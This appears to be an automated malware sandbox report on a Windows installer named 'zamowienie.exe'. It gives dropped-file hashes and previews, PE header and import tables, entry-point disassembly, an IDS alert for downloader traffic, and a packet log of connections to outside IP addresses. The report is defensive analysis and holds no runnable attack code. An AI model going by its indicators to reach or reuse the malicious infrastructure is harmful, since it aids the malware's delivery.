                                                                                                                                            SHA-512:B4477CA107ABD7D76DBFDEA265DF666CF8C8D3033A21FA99E15BFFF71C82C446C428F39089B61BDE4338161611B2A8AAE3E4636DFE59DA315CF423FEFEF3DD3F
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):288628
                                                                                                                                            Entropy (8bit):1.2566116974289765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:WQPHdCHjQjfdirwUixgOmEojE3vgFsZYfeWnfYaHKzalU3B0NyxyJe5d5kvliu0l:RATSyUPyIYQ32kMXmfx
                                                                                                                                            MD5:B2C941D872423FC08B9A939082E1DBDB
                                                                                                                                            SHA1:8E0AAF70970B0E52EF62E7DC5A487388C2FD498C
                                                                                                                                            SHA-256:C80487F3C9A8680862E5C671A2963952708C1C9DA652C4A6FEC0D0FE08FBEF80
                                                                                                                                            SHA-512:42D91AB1B9EA30CEDE236E78958005970E49279E3A57088F13CDD5B5F95AD1819F3E1E9E60B48363C9FE9B694DA02927DEFFC5DAA9040DBCA80A10F2B2589862
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):273163
                                                                                                                                            Entropy (8bit):7.726230579771076
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:mMONxD8JxqR+UfGn3X8TEN8NdMk8yPAudYL:ykdcGn6ENcVVlYL
                                                                                                                                            MD5:EFFDB1201D3175E286C09DE584BD3869
                                                                                                                                            SHA1:03E0C734BC3F679698AB7E22ABA75AE0ABEB4907
                                                                                                                                            SHA-256:4A91016FCAEF3FCED70DF3A64C81EEEF5D6B4103AE1A72E052209BE0E4BEBD3A
                                                                                                                                            SHA-512:0E73339CF2782058576127F0FFBFA47301C40DC3DD02B8D66B36E3849BF0821B02F89FA854E86A99F212CC418EDC9F6D9579EE9DB226A888C695590E086E5949
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):259685
                                                                                                                                            Entropy (8bit):1.2400438107539822
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cA1hV6OhcgJ9H+VkvR1iNrNFhFO3S3nRyyFCHNDhzPZZKCVDz7nLZEXYHF5VFYao:bu4R0PIXFl5tpxiHqGgg
                                                                                                                                            MD5:DF7575B0A922EB9254C2FD55589079B5
                                                                                                                                            SHA1:48E2566AB591EE6BC5715F8F38D834D9742A976C
                                                                                                                                            SHA-256:94D26D3C091C937F49C5E8A4822703C79C4B41182210DAA4A9672F446BD7FFCC
                                                                                                                                            SHA-512:41CB5A47835FE8198D6A793CBDB1F01C5420C89FB7854975CC9AA678B990B4C2AD1E3541C0212ED09413C6AC402AABCE37D82595913D6D4759CEC0752F889CD9
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):440119
                                                                                                                                            Entropy (8bit):1.2627229150298473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Pc0CNJubDNkJcJTg5nvTxtqx/uvk92q0:2WNkqJTCvTI0kV
                                                                                                                                            MD5:D5EBCE57E1D1D9263FC83E5AAE05A4A2
                                                                                                                                            SHA1:9823E2CBD8EC9C67620B1852DCE565E749A2332B
                                                                                                                                            SHA-256:7AA6A6E87EFFAF70C1091FA64DC6E513DFEED53E299DE8439596BE9A68411BF8
                                                                                                                                            SHA-512:ADDB94222D46A1631816DC5B583C9B1CB1AEA6BEA57E6D6A2341DF7FE5C22CC87CF167EA18CFDE25260A42B930389B9DA3499B344F071F3F8E3900774CD01008
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):314929
                                                                                                                                            Entropy (8bit):1.250025321927161
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:oBwt8US5+D9XpKLvU4/YzSg+Od2T5JufC6Ipuf5RKvOT5kMfA71lqBq1QaOWAge5:Wy7IYDSPR7VUxeA
                                                                                                                                            MD5:29C3C147CD963631AA9C52024A042309
                                                                                                                                            SHA1:F667FEAED1C0F49314CA68E4E68D634F34D18348
                                                                                                                                            SHA-256:C3C7B18682AEAE9ED4CDF40F8EC4FC2A128F034EE96737DA1D763755AAEFC249
                                                                                                                                            SHA-512:F26CE22F6057877F16738272E4E2D934A9A9F0AD1DC153ACF0AA1252EA86DA028BE27D4535E741F69F84544A8E58218FBE5B840F7148888DC3C37F6689A28D4D
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):322200
                                                                                                                                            Entropy (8bit):1.2423405868446242
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:yNzqAluqE73OpE8nzxJ0abXyz639Xlv/qBWpFE7FIfyvwz6rW4TmhA0gXQUehsG1:Ysauwllgvr+1Q2ROSRxQ4P
                                                                                                                                            MD5:EE612E81775E0F972E97D6DF0AEA0069
                                                                                                                                            SHA1:8DD3AB1FDB01F14FF70D52E4C72129516F06CBDD
                                                                                                                                            SHA-256:ECA6AC6498377C0CDA20C322E5F5C6BDCE2970E9322E0E0C175645F1EE1C71DE
                                                                                                                                            SHA-512:4EA48619ABF3F67AF06CF662B6EC28DBFAF24A4425EC7FDB70BDFFAE06AFB409D47755A1A9B6C93A74CC3C2C3B874388A9130D4764C225E6AB6C198936BB5B22
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):385976
                                                                                                                                            Entropy (8bit):1.244155886205187
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:LyAGtdTW/3IAy+unM7Byvu6C7JYtzlS70QpHRNXvCp8mkXhUOFttrIMDMiE3CblT:qioDZWJAT4WMrLNRoNSyYpH
                                                                                                                                            MD5:1ACF5662CECA662D7ABCA1BAC4AF2D93
                                                                                                                                            SHA1:984F9C01EEC648BBC93ED852994ACA226AFC62FE
                                                                                                                                            SHA-256:829932E0769F886E2E42E2EEC4C758563410BD69527783100E8DA449C4DC4399
                                                                                                                                            SHA-512:0EF38CA57779E91E14B2481850C865B7D723DB31BE408F6E3F055D9FF462B9C1383AEA1FCAD6165C7E630CA9B9CFFF62F76280D6CF5B5A1DC5217906C9881736
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):422
                                                                                                                                            Entropy (8bit):4.216384920844683
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:P0tAqgrQB0a8RjGdf3R+XsUaN+eZv2pIpui2eT:89aZLSJ348UaNdbR
                                                                                                                                            MD5:0C29FCC20D20A40DA37D6E0CB1BA826C
                                                                                                                                            SHA1:5B115AA28E37EFAE0C784E1F6CDEC0F6A34618CF
                                                                                                                                            SHA-256:7B312B99789E4E4CF69BE94036E1CF627EAF0991EDC1185CEC3FCEABF2E1474B
                                                                                                                                            SHA-512:1A4758AF55713379A5DBFA8693660D5D7CEAC8E4416B3208944A97388E94B10A8618491CDD0924963E7D881231C8791991A9CAA18EF7C83B5D921768F243527C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:bipperen predating shambala brsteormens folkemordene trklosettets signerede soljers paralleller forerequest..folioark identifikationen skarv stoejdelen,barbzwr diagonalt driftsaaret oboistens auraer misstemningers vrangforestillingernes oceanet afmeldelsen acceding ercoli tenontomyotomy..pitons homeostases sanseredskabernes supercedes monoureide kvrkes,inc garderobeskabes abutments,skabelserne enamorato polyrhythmical,
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):824
                                                                                                                                            Entropy (8bit):3.298645295770995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8wl0nsXU19zK99k9eQ14kWRGiD1kA/rNJkKAh4t2YZ/elFlSJm:8YgK99k9/KRGiDR5HALqy
                                                                                                                                            MD5:3F22A092A9ADA770A8226DAFFDA1769B
                                                                                                                                            SHA1:922676C96C7E18B3F4E4D6B95E38058E61C777CD
                                                                                                                                            SHA-256:661DE0E6C3CE5446A1E5B8DF8FFFDB2D2D772A59D71708AE882235DEE8995FA2
                                                                                                                                            SHA-512:F76BF1B014FCC8BDA8976BD676B465F27F1D80FAE2979FC2470FF64AA6F77CEBC650582E85EF8F2F951EFBBCFB406D9FF62F042013C6B12C78EBDC2724EE536C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F........................................................E....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....r.2...........salrernes.Unl229..R............................................s.a.l.r.e.r.n.e.s...U.n.l.2.2.9... ...#.....\.....\.U.s.e.r.s.\.a.l.f.o.n.s.\.s.a.l.r.e.r.n.e.s...U.n.l.2.2.9.I.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.r.e.a.l.m.l.e.s.s.\.h.o.v.e.d.v.a.g.t.s.\.c.h.a.p.e.r.o.n.e.n.\.U.n.r.i.s.i.n.g.2.1.8.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Entropy (8bit):7.952609681309242
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:zamowienie.exe
                                                                                                                                            File size:775'216 bytes
                                                                                                                                            MD5:48f82f781035def809b0cdb2f66097a9
                                                                                                                                            SHA1:4a4ddf2315449dfcad4682fe6860e617b94e60b1
                                                                                                                                            SHA256:50f7a5ef12735cba58b3990988df8384294b42863033acc3d1bd939c3d00bdc5
                                                                                                                                            SHA512:a084fb2d21b095fbc7e919c47c27173c6f1eb6cdd6e79508cacb8660167d1b2d96d0df7eb42626f8b3c201a8a0110e7a61e4050c0b17c39226b525a9453dcecd
                                                                                                                                            SSDEEP:12288:huOjVDNtkrL1G7jcqcGSEpg8PwEHeubieXThqj+2t5MZzWBcrek/P/6g9d9oucMQ:DxDTkd9qcepnLHeotqy2nMZzwGF/hd9o
                                                                                                                                            TLSH:9CF4235646B1ECBFDC254EB1E85509F2B37AAE01C8622F9F3B513E517D3100A9C2B297
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................d...........4............@
                                                                                                                                            Icon Hash:1363513931716d11
                                                                                                                                            Entrypoint:0x4034f1
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x660843F5 [Sat Mar 30 16:55:17 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:0293eec0b5432ad092f24065016203b2
                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=Asketr, O=Asketr, L=Thuy, C=FR
                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                            Error Number:-2146762487
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 07/07/2024 08:15:25 07/07/2027 08:15:25
                                                                                                                                            Subject Chain
                                                                                                                                            • CN=Asketr, O=Asketr, L=Thuy, C=FR
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:7EFD3ECB897E2ABECE07C7AC593B6430
                                                                                                                                            Thumbprint SHA-1:5B237C489CF2690FDD6A54BA1FC9A26943EC328B
                                                                                                                                            Thumbprint SHA-256:86393C8AF42EC06CBABEFFCB898F002E13075B185BC69AE87F69C2D0639676E6
                                                                                                                                            Serial:27380871A98FC2A9D010B5F5E699C9926A436723
                                                                                                                                            Instruction
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            sub esp, 00000224h
                                                                                                                                            push esi
                                                                                                                                            push edi
                                                                                                                                            xor edi, edi
                                                                                                                                            push 00008001h
                                                                                                                                            mov dword ptr [ebp-14h], edi
                                                                                                                                            mov dword ptr [ebp-0Ch], 0040A130h
                                                                                                                                            mov dword ptr [ebp-08h], edi
                                                                                                                                            mov byte ptr [ebp-04h], 00000020h
                                                                                                                                            call dword ptr [00408094h]
                                                                                                                                            mov esi, dword ptr [00408098h]
                                                                                                                                            lea eax, dword ptr [ebp-000000C4h]
                                                                                                                                            push eax
                                                                                                                                            mov dword ptr [ebp-000000B0h], edi
                                                                                                                                            mov dword ptr [ebp-30h], edi
                                                                                                                                            mov dword ptr [ebp-2Ch], edi
                                                                                                                                            mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                                                                                            call esi
                                                                                                                                            test eax, eax
                                                                                                                                            jne 00007F7A411FDCB1h
                                                                                                                                            lea eax, dword ptr [ebp-000000C4h]
                                                                                                                                            mov dword ptr [ebp-000000C4h], 00000094h
                                                                                                                                            push eax
                                                                                                                                            call esi
                                                                                                                                            cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                                            jne 00007F7A411FDC9Ch
                                                                                                                                            movsx cx, byte ptr [ebp-000000A3h]
                                                                                                                                            mov al, byte ptr [ebp-000000B0h]
                                                                                                                                            sub ecx, 30h
                                                                                                                                            sub al, 53h
                                                                                                                                            mov byte ptr [ebp-2Ah], 00000004h
                                                                                                                                            neg al
                                                                                                                                            sbb eax, eax
                                                                                                                                            not eax
                                                                                                                                            and eax, ecx
                                                                                                                                            mov word ptr [ebp-30h], ax
                                                                                                                                            cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                                            jnc 00007F7A411FDC94h
                                                                                                                                            and byte ptr [ebp-2Ah], 00000000h
                                                                                                                                            cmp byte ptr [ebp-000000AFh], 00000041h
                                                                                                                                            jl 00007F7A411FDC83h
                                                                                                                                            movsx ax, byte ptr [ebp-000000AFh]
                                                                                                                                            sub eax, 40h
                                                                                                                                            mov word ptr [ebp-30h], ax
                                                                                                                                            jmp 00007F7A411FDC76h
                                                                                                                                            mov word ptr [ebp-30h], di
                                                                                                                                            cmp dword ptr [ebp-000000C0h], 0Ah
                                                                                                                                            jnc 00007F7A411FDC7Ah
                                                                                                                                            and word ptr [ebp+00000000h], 0000h
                                                                                                                                            Programming Language:
                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8430 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x9248 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xbb1b0 | 0x2280 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x63f1 | 0x6400 | 5d54def596b9971f96b3f992edc6841d | False | 0.6694140625 | data | 6.447221756584503 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x1234 | 0x1400 | 3c475f0d07d8baa23af20787c8b2799b | False | 0.4265625 | data | 5.027896508511247 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x1a458 | 0x600 | da42354b535260f16ded3e942182ee49 | False | 0.447265625 | data | 4.104708836261179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x25000 | 0x1f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x44000 | 0x9248 | 0x9400 | c0efcca114a98028d7be948c6cec3c1a | False | 0.5374524915540541 | data | 6.082470874944529 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_BITMAP | 0x444c0 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x44828 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3420124481327801 |
| RT_ICON | 0x46dd0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.44043151969981237 |
| RT_ICON | 0x47e78 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.5618336886993603 |
| RT_ICON | 0x48d20 | 0xd73 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9215800174266628 |
| RT_ICON | 0x49a98 | 0xa55 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9164461247637051 |
| RT_ICON | 0x4a4f0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.7256317689530686 |
| RT_ICON | 0x4ad98 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.501219512195122 |
| RT_ICON | 0x4b400 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.7109826589595376 |
| RT_ICON | 0x4b968 | 0x49c | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9779661016949153 |
| RT_ICON | 0x4be08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7358156028368794 |
| RT_ICON | 0x4c270 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6586021505376344 |
| RT_ICON | 0x4c558 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.8614864864864865 |
| RT_DIALOG | 0x4c680 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0x4c7c8 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0x4c908 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x4ca08 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x4cb28 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x4cbf0 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x4cc50 | 0xae | data | English | United States | 0.6149425287356322 |
| RT_VERSION | 0x4cd00 | 0x204 | data | English | United States | 0.5290697674418605 |
| RT_MANIFEST | 0x4cf08 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795 |

| DLL | Import |
| --- | --- |
| ADVAPI32.dll | RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA |
| SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA |
| ole32.dll | OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree |
| COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create |
| USER32.dll | SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu |
| GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor |
| KERNEL32.dll | CreateProcessA, RemoveDirectoryA, GetTempFileNameA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, SetEnvironmentVariableA, ExitProcess, WriteFile, GetCurrentProcess, ReadFile, GetModuleFileNameA, GetFileSize, CreateFileA, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CopyFileA |

| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-10-22T13:26:47.176136+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49876 | 185.17.43.223 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                            Oct 22, 2024 13:26:47.737373114 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.737396955 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.737426043 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.750183105 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.750202894 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.750214100 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.750258923 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:27:39.010672092 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.016484022 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.017102957 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.024836063 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.030426979 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917622089 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917649031 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917661905 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917671919 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917684078 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917694092 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917711973 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917723894 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917732954 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917745113 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917751074 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.917870998 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:40.069418907 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:40.069715977 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:40.071126938 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:40.076570034 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:55.480315924 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:55.486053944 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:55.486140966 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:55.497391939 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:55.502883911 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199512005 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199558020 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199609041 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.199614048 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199650049 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199686050 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199692011 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.199718952 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199754000 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199762106 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.199788094 CEST8049978216.40.34.41192.168.2.5
